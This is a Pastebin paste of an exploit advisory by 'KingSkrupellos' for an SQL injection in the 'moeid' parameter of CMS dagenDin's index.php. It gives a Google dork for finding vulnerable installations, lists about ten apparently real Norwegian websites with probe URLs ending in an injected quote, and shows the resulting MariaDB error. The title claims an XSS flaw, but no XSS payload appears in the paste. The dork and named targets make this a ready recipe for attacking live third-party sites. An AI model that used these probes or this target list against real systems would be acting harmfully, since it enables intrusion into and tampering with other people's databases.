KingSkrupellos

CMS dagenDin Norway XSS SQL Injection

Mar 25th, 2020
166
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.35 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : CMS dagenDin Norway XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 26/03/2020
  7. # Vendor Homepage : dagendin.no
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : CMS dagenDin inurl:/index.php?f= site:no
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. CMS dagenDin Norway is prone to an SQL-injection vulnerability because
  23. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  24. Exploiting this issue could allow an attacker to compromise the application, access or
  25. modify data, or exploit latent vulnerabilities in the underlying database.
  26. A remote attacker can send a specially crafted request to the vulnerable application and
  27. execute arbitrary SQL commands in application`s database. Further exploitation of this
  28. vulnerability may result in unauthorized data manipulation.
  29. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30.  
  31. ###################################################################
  32.  
  33. # SQL Vulnerable File :
  34. **********************
  35. /index.php
  36.  
  37. # SQL Vulnerable Parameter :
  38. ***************************
  39. ?f=[ID-NUMBER]&sid=&eid=&spid=[ID-NUMBER]&mosid=[ID-NUMBER]&moeid=[SQL Injection]
  40.  
  41. # SQL Injection Exploit :
  42. **********************
  43. /index.php?f=[ID-NUMBER]&sid=&eid=&spid=[ID-NUMBER]&mosid=[ID-NUMBER]&moeid=[SQL Injection]
  44.  
  45. ###################################################################
  46.  
  47. # Example Vulnerable Sites :
  48. *************************
  49. [+] dagendin.no/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  50.  
  51. [+] nvg2006.dagendin.com/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  52.  
  53. [+] kjolsdalenkrins.no/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  54.  
  55. [+] varden4h.nordsida.no/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  56.  
  57. [+] bryggja.no/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  58.  
  59. [+] rosetpanorama.no/en/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  60.  
  61. [+] innvik.vikanenett.no/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  62.  
  63. [+] kjolsdalenkrins.no/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  64.  
  65. [+] fordefjorden.no/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  66.  
  67. [+] stryn-underhaldning.no/index.php?f=08050160&sid=&eid=&spid=268&mosid=2&moeid=1%27
  68.  
  69. ###################################################################
  70.  
  71. # Example SQL Database Error :
  72. ****************************
  73. Database error: Query DB == false, query failed
  74. Mysql Error: 0 (1064: You have an error in your SQL syntax; check the manual that corresponds
  75. to your MariaDB server version for the right syntax to use near ''' at line 1)
  76.  
  77. ###################################################################
  78.  
  79. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  80.  
  81. ###################################################################
Add Comment
Please, Sign In to add comment